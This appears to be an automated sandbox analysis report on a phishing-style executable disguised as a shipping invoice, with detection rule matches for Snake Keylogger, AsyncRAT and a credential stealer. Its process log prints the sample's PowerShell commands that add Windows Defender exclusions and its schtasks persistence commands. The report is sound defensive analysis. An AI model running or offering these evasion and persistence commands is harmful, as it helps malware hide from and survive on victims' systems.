Source: 25.2.ungagCKiEnZdl.exe.16f23cc0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 25.2.ungagCKiEnZdl.exe.16f23cc0.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 25.2.ungagCKiEnZdl.exe.16f23cc0.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 25.2.ungagCKiEnZdl.exe.16f23cc0.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 15.2.bxhciy.exe.17034708.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.bxhciy.exe.17034708.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.bxhciy.exe.17034708.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.bxhciy.exe.17034708.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 15.2.bxhciy.exe.17053d48.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.bxhciy.exe.17053d48.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.bxhciy.exe.17053d48.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.bxhciy.exe.17053d48.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 25.2.ungagCKiEnZdl.exe.16f23cc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 25.2.ungagCKiEnZdl.exe.16f23cc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 25.2.ungagCKiEnZdl.exe.16f23cc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 25.2.ungagCKiEnZdl.exe.16f23cc0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 25.2.ungagCKiEnZdl.exe.16f04680.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 25.2.ungagCKiEnZdl.exe.16f04680.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.bxhciy.exe.17034708.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 25.2.ungagCKiEnZdl.exe.16f04680.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 25.2.ungagCKiEnZdl.exe.16f04680.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 15.2.bxhciy.exe.17034708.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.bxhciy.exe.17034708.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.bxhciy.exe.17034708.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000E.00000002.2103901162.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000010.00000000.2162076092.0000000000442000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000010.00000000.2162076092.0000000000442000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000A.00000002.2124704739.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2088900263.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000019.00000002.2265748845.0000000016F04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000019.00000002.2265748845.0000000016F04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000F.00000002.2212820152.0000000017034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000F.00000002.2212820152.0000000017034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: bxhciy.exe PID: 7844, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: bxhciy.exe PID: 7844, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: bdeukn.exe PID: 7852, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: bdeukn.exe PID: 7852, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: ungagCKiEnZdl.exe PID: 4416, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: ungagCKiEnZdl.exe PID: 4416, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe, type: DROPPED	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe, type: DROPPED	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe, type: DROPPED	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: SCS AWB and Commercial Invoice.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: HOYVjVj.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: bxhciy.exe.9.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: bdeukn.exe.9.dr, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: bdeukn.exe.9.dr, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: bdeukn.exe.9.dr, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: bdeukn.exe.9.dr, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.raw.unpack, Settings.cs	Base64 encoded string: 'vQHu86W4U0PPB/akKI7kD5qHUFwa+xYF3gOQGnobY8gyItJRdA0B2DU8RS/mabVRBk9sdbK7kYmYEooq7r3cSFahErr+2sSrrCkEhHvtSV4='
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.raw.unpack, Settings.cs	Base64 encoded string: 'vQHu86W4U0PPB/akKI7kD5qHUFwa+xYF3gOQGnobY8gyItJRdA0B2DU8RS/mabVRBk9sdbK7kYmYEooq7r3cSFahErr+2sSrrCkEhHvtSV4='
Source: bdeukn.exe.9.dr, COVID19.cs	Base64 encoded string: 'no96N5bpjzY4pegtbEuphxtBOR1RSjNlG2Yzeiodho3ErdxildOBoIasy7/xNxwE'

Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, iG6Ol3nKUDlcTUrOfA.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, iG6Ol3nKUDlcTUrOfA.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, iG6Ol3nKUDlcTUrOfA.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, iG6Ol3nKUDlcTUrOfA.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, iG6Ol3nKUDlcTUrOfA.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, iG6Ol3nKUDlcTUrOfA.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, We2suwySDrHA5V0J8S.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, We2suwySDrHA5V0J8S.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, We2suwySDrHA5V0J8S.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, We2suwySDrHA5V0J8S.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, We2suwySDrHA5V0J8S.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, We2suwySDrHA5V0J8S.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, iG6Ol3nKUDlcTUrOfA.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, iG6Ol3nKUDlcTUrOfA.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, iG6Ol3nKUDlcTUrOfA.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@39/30@4/4

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe

File created: C:\Users\user\AppData\Roaming\HOYVjVj.exe

Jump to behavior

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Mutant created: \Sessions\1\BaseNamedObjects\TZcnTcBHbLCXf1ef
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3668:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Mutant created: \Sessions\1\BaseNamedObjects\DOWHcqZraCqmccjAZ
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Mutant created: \Sessions\1\BaseNamedObjects\QVlmzerwuSyTvEGoDsBBIwcZfwk
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3920:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe

File created: C:\Users\user\AppData\Local\Temp\tmp5EFD.tmp

Jump to behavior

Source: SCS AWB and Commercial Invoice.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SCS AWB and Commercial Invoice.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: bdeukn.exe, 00000010.00000002.4510487041.0000000003A4E000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4529315230.00000000137A9000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4510487041.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4510487041.00000000039F7000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4510487041.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4510487041.0000000003A07000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.0000000003800000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.00000000037BA000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.00000000037AA000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.00000000037F3000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.00000000037C8000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SCS AWB and Commercial Invoice.exe	ReversingLabs: Detection: 47%
Source: SCS AWB and Commercial Invoice.exe	Virustotal: Detection: 40%

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe

File read: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe "C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe"
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HOYVjVj.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HOYVjVj" /XML "C:\Users\user\AppData\Local\Temp\tmp5EFD.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process created: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe "C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\HOYVjVj.exe C:\Users\user\AppData\Roaming\HOYVjVj.exe
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HOYVjVj" /XML "C:\Users\user\AppData\Local\Temp\tmp7237.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Process created: C:\Users\user\AppData\Roaming\HOYVjVj.exe "C:\Users\user\AppData\Roaming\HOYVjVj.exe"
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process created: C:\Users\user\AppData\Local\Temp\bxhciy.exe "C:\Users\user\AppData\Local\Temp\bxhciy.exe"
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Process created: C:\Users\user\AppData\Local\Temp\bdeukn.exe "C:\Users\user\AppData\Local\Temp\bdeukn.exe"
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\bxhciy.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe"
